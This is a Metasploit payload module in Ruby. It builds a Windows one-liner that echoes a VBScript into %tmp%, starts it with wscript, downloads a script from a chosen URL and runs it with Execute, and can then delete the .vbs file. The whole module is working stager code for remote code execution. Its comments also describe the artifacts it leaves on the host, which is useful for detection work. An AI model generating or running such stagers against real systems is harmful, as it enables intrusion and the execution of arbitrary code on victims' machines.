##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Command-shell payload: a single Windows command line that echoes a one-line
# VBScript into %tmp%, starts it, and lets the script fetch a URL through
# Microsoft.XMLHTTP and Execute the response body. The host-side artifacts the
# code itself produces are the <random>.vbs file written under %tmp% (which the
# script removes as its last statement when DELETE is set) and the wscript
# process that runs it.
module MetasploitModule
  # The command length depends on the option flags and the URL, so no fixed size.
  CachedSize = :dynamic

  include Msf::Payload::Single
  include Msf::Sessions::CommandShellOptions

  # Registers the module metadata and the options that shape the command line.
  #
  # @param info [Hash] base module info merged with this module's metadata
  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows Executable Download and Evaluate VBS',
        'Description' => %q{
          Downloads a file from an HTTP(S) URL and executes it as a vbs script.
          Use it to stage a vbs encoded payload from a short command line.
        },
        'Author' => 'scriptjunkie',
        'License' => BSD_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_CMD,
        'Handler' => Msf::Handler::None,
        'Session' => Msf::Sessions::CommandShell,
        'PayloadType' => 'cmd',
        'RequiredCmd' => 'wscript',
        'Payload' => {
          'Offsets' => {},
          'Payload' => ''
        }
      )
    )

    # URL is interpolated verbatim into the VBScript (no quoting or encoding is
    # applied by command_string), which is why it is described as pre-encoded.
    register_options(
      [
        OptString.new('URL', [ true, 'The pre-encoded URL to the script' ]),
        OptBool.new('INCLUDECMD', [ true, 'Include the cmd /q /c', false ]),
        OptBool.new('INCLUDEWSCRIPT', [ true, 'Include the wscript command', false ]),
        OptBool.new('DELETE', [ true, 'Delete created .vbs after download', false ])
      ]
    )
  end

  # Generates the payload: whatever the superclass produces for the static
  # 'Payload' entry, followed by the command line built from the datastore.
  #
  # @param _opts [Hash] unused here; forwarded to the superclass
  # @return [String] the payload bytes
  def generate(_opts = {})
    super + command_string
  end

  # Assembles the Windows command line from the current datastore.
  #
  # The line changes to %tmp%, echoes the VBScript into <name>.vbs and launches
  # it with "start" rather than invoking the file directly, so the console
  # window closes before wscript's libraries load and the download completes.
  # Because URL is dropped in unquoted, a value containing '"' or '&' breaks the
  # generated script or command line.
  #
  # @return [String] the command line; prefixed with "cmd.exe /q /c " when
  #   INCLUDECMD is set, launching via "wscript " when INCLUDEWSCRIPT is set
  def command_string
    # One- or two-letter identifiers keep the one-liner short.
    vbs = Rex::Text.rand_text_alpha(1..2)
    http = Rex::Text.rand_text_alpha(1..2)

    # VBScript statements, later joined with ':' into a single line.
    script = [
      %(Set #{http}=CreateObject("Microsoft.XMLHTTP")),
      %(#{http}.Open "GET","#{datastore['URL']}",False),
      "#{http}.Send",
      "Execute #{http}.responseText"
    ]
    # With DELETE the script removes its own .vbs file as its final statement.
    script << %(CreateObject("Scripting.FileSystemObject").DeleteFile "#{vbs}.vbs") if datastore['DELETE']

    prefix = datastore['INCLUDECMD'] ? 'cmd.exe /q /c ' : ''
    launcher = datastore['INCLUDEWSCRIPT'] ? "wscript #{vbs}.vbs" : "#{vbs}.vbs"

    "#{prefix}cd %tmp%&echo #{script.join(':')} >#{vbs}.vbs&start #{launcher}"
  end
end